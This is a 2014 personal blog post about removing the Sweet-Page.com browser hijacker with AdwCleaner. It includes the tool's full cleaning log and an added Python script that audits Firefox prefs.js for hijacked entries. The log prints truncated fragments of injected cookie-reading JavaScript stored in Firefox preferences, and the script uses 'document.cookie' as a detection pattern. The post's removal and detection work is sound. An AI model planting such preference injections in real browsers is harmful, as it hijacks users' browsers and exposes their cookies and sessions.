Wednesday, 11 June 2014

How to Remove a Browser Hijacker



Hey guys, I'm back again. This time I've got a really effective tip for you. A while ago this tip saved my browser. So, the other day the HOMEPAGE of my browser (Mozilla Firefox) changed to Sweet-Page.com. Normally, when you open Mozilla you get the 'Google search engine' right away, right? Well, this time it was different: I opened Mozilla and got Sweet-Page.com instead.


I got suspicious about what Sweet-Page actually was. Since I'm the suspicious type, I googled it right away. It turns out it's a kind of "virus" in the form of a "browser hijacker". The most dangerous consequence of this virus is that it can steal your valuable data, such as your email and its password, your M-Banking data, and other disgraceful deeds. Well, what do you expect, Sweet-page.com never went to religious lessons as a kid.. *lol

In more detail, here are some of their 'disgraceful' deeds:

1.   Changing the default homepage, or the homepage setting we configured ourselves, when the internet browser first starts.
For example: if your default homepage is Google, it will change to Sweet-page.com, as in the image above.
2.   Changing the default search engine every time you open the browser or open a new tab, i.e. a search engine hijacker, as shown in the picture above.
3.   Spying on our browsing habits based on cookies and the history of the websites we visit, so that you get flooded with all kinds of very annoying ads.

So why did sweet-page.com end up on my laptop?

Good question! The other day I downloaded some free software from a sketchy website.

You've probably been through something this annoying too. So stay alert, guys. FYI, there are other browser hijackers besides sweet-page.com. Among them: Start.Qone8.com, MySearch, ShopNav, AboutBlank, CoolWebSearch, CoolWebSearch.image, Onlinestability.com, Security Toolbar, HeretoFind, and plenty more.

Back to sweet-page.com....

According to Malware Tips, a site that shares how to remove Sweet-Page and other malware:

"Sweet-Page.com is a browser hijacker, which is promoted via other free downloads, and once installed it will change your browser homepage to sweet-page.com."

Bottom line, the Sweet-Page.com "virus" malware has to be deleted, wiped out, killed! Here's how:

Download AdwCleaner from this link: ADWCLEANER DOWNLOAD LINK (This link will automatically download AdwCleaner on your computer).

Before installing AdwCleaner, close all programs and internet browsers that are open.

    Double-click the AdwCleaner icon you just downloaded (the install process).

    Once the install is finished, AdwCleaner will open.

    Click the Scan button

    When the scan is done, click the Clean button. Kill them all!

Here's what AdwCleaner did on my computer, including removing the Sweet-Page.com malware.

# AdwCleaner v3.023 - Report created 04/04/2014 at 23:35:16
# Updated 01/04/2014 by Xplode
# Operating System : Windows 7 Ultimate  (32 bits)
# Username : 1 - 1-PC
# Running from : D:\DOWNLOADS\adwcleaner.exe
# Option : Clean

***** [ Services ] *****
***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\boost_interprocess
Folder Deleted : C:\ProgramData\SNT
Folder Deleted : C:\ProgramData\WPM
Folder Deleted : C:\Program Files\Mega Browse
Folder Deleted : C:\Program Files\SNT
Folder Deleted : C:\Users\1\AppData\Local\Mobogenie
Folder Deleted : C:\Users\1\AppData\Local\torch
Folder Deleted : C:\Users\1\AppData\Local\Temp\Mega Browse
Folder Deleted : C:\Users\1\Documents\Mobogenie
Folder Deleted : C:\Users\FAMILY\AppData\Local\Conduit
Folder Deleted : C:\Users\FAMILY\AppData\Local\NativeMessaging
Folder Deleted : C:\Users\FAMILY\AppData\Local\torch
Folder Deleted : C:\Users\FAMILY\AppData\Local\Temp\NativeMessaging
Folder Deleted : C:\Users\FAMILY\AppData\LocalLow\Conduit
Folder Deleted : C:\Users\FAMILY\AppData\Roaming\baidu
File Deleted : C:\END
File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\searchplugins\WebSearch.xml
File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\user.js
File Deleted : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\user.js
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_app.mam.conduit.com_0.localstorage-journal
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage
File Deleted : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_storage.conduit.com_0.localstorage-journal

***** [ Shortcuts ] *****

Shortcut Disinfected : C:\Users\Public\Desktop\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\Desktop\Firefox NEW.lnk
Shortcut Disinfected : C:\Users\1\Desktop\Firefox OLD.lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk
Shortcut Disinfected : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
Shortcut Disinfected : C:\Users\1\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\au__rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\LiveSupport_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\livesupport_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\Mobogenie_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasapi32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\optprostart_rasmancs
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MobogenieAdd
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [mobilegeni daemon]
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_for_utorrent_RASMANCS
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Data Restored : HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command
Key Deleted : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Deleted : HKLM\Software\supWPM

***** [ Browsers ] *****

-\\ Internet Explorer v8.0.7600.16385

Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]

-\\ Mozilla Firefox v28.0 (en-US)

[ File : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\g9ak8vl0.default\prefs.js ]

Line Deleted : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");
Line Deleted : user_pref("browser.search.order.1", "WebSearch");
Line Deleted : user_pref("browser.search.order.1,S", "WebSearch");
Line Deleted : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Deleted : user_pref("extensions.0sd.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorob[...]
Line Deleted : user_pref("extensions.2Mua0n5fa.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Line Deleted : user_pref("extensions.IwfG.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumoro[...]
Line Deleted : user_pref("extensions.L1CjSWwAf.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Line Deleted : user_pref("keyword.URL", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51&l=1&q=");

[ File : C:\Users\1\AppData\Roaming\Mozilla\Firefox\Profiles\muewrru8.default\prefs.js ]

Line Deleted : user_pref("browser.startup.homepage", "hxxp://websearch.amaizingsearches.info/?pid=1091&r=2014/04/04&hid=10235128211098029313&lg=EN&cc=ID&unqvl=51");

[ File : C:\Users\FAMILY\AppData\Roaming\Mozilla\Firefox\Profiles\cttpyw9p.default\prefs.js ]


-\\ Google Chrome v33.0.1750.154

[ File : C:\Users\1\AppData\Local\Google\Chrome\User Data\Default\preferences ]


[ File : C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [39744 octets] - [28/02/2014 21:45:46]
AdwCleaner[R1].txt - [9773 octets] - [04/04/2014 23:33:36]
AdwCleaner[S0].txt - [36508 octets] - [28/02/2014 21:48:20]
AdwCleaner[S1].txt - [7978 octets] - [04/04/2014 23:35:16]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [8038 octets] ##########
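
The "Line Deleted" entries in the Firefox part of the report show which preferences the hijacker rewrote in prefs.js. The script below is an added example, not part of the original post or of AdwCleaner: it checks a prefs.js text for the same kind of entries. The allow-lists and the sample lines are assumptions made up for the illustration, and the hosts in the sample are placeholders.

```python
import re
from urllib.parse import urlparse

# Keys taken from the "Line Deleted" entries in the report above.
URL_KEYS = {"browser.startup.homepage", "browser.search.defaulturl", "keyword.URL"}
ENGINE_KEYS = {"browser.search.defaultenginename", "browser.search.selectedEngine",
               "browser.search.order.1"}
# Assumptions: what this user considers legitimate. Adjust to your own setup.
ALLOWED_HOSTS = {"www.google.com"}
ALLOWED_ENGINES = {"Google"}

PREF_RE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)*)",\s*(.*)\);\s*$')

def parse_prefs(text):
    """Yield (key, value) for every user_pref line; string values are unescaped."""
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if not m:
            continue
        key, raw = m.group(1), m.group(2).strip()
        if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            raw = re.sub(r'\\(.)', r'\1', raw[1:-1])
        yield key, raw

def audit(text):
    """Return a list of (key, reason) findings for hijack-style preferences."""
    findings = []
    for key, value in parse_prefs(text):
        base = key.split(",")[0]          # the report lists some keys with a ",S" suffix
        if base in URL_KEYS:
            for url in value.split("|"):  # the homepage pref may hold several URLs
                host = urlparse(url).hostname
                if host and host not in ALLOWED_HOSTS:
                    findings.append((key, "unexpected host " + host))
        elif base in ENGINE_KEYS and value not in ALLOWED_ENGINES:
            findings.append((key, "unexpected search engine " + value))
        elif base.endswith(".scode") or "document.cookie" in value:
            findings.append((key, "script stored in a preference"))
    return findings

# Constructed sample modelled on the report; not copied from a real profile.
SAMPLE = r'''
user_pref("browser.startup.homepage", "http://search.example.invalid/?pid=1");
user_pref("browser.search.selectedEngine,S", "WebSearch");
user_pref("extensions.abc.scode", "(function(){var u=(location.href + document.cookie);})();");
user_pref("browser.startup.homepage_override.mstone", "28.0");
user_pref("keyword.URL", "https://www.google.com/search?q=");
'''

if __name__ == "__main__":
    for key, reason in audit(SAMPLE):
        print(f"{key}: {reason}")
```

Run it over both prefs.js and user.js in every profile folder: the report shows user.js files being deleted as well, and Firefox re-applies user.js on each start, so a leftover user.js would put the hijacked values back.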


Finally, AdwCleaner did a great job removing that virus from my laptop. Thank you AdwCleaner, and special thanks to the fellow bloggers who shared this cool tip. My last piece of advice: don't carelessly download and install software, especially from free links or sites! Be careful......! Crime is all around you, even from places you never expected...!

See U Next Post...!
